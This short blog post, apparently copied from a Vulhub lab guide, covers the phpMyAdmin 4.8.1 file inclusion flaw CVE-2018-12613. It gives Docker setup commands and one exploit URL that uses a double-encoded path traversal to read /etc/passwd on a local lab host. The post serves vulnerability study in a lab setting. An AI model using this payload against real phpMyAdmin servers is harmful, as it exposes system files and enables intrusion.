CVE-2018-12613

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the index.php, causing files iclusion vulnerabilitiy.

Setup

cd vulhub/phpmyadmin/cve-2018-12613
docker-compose up -d

After the environment starts,visit http://10.10.10.8:8080. The phpmyadmin is "config" mode,so we can login directly.

Exploit

Visit http://10.10.10.8:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd, the result indicates that the file inclusion vulnerability exist:
img

posted @ 2024-05-23 10:24  kalixcn  阅读(27)  评论(0编辑  收藏  举报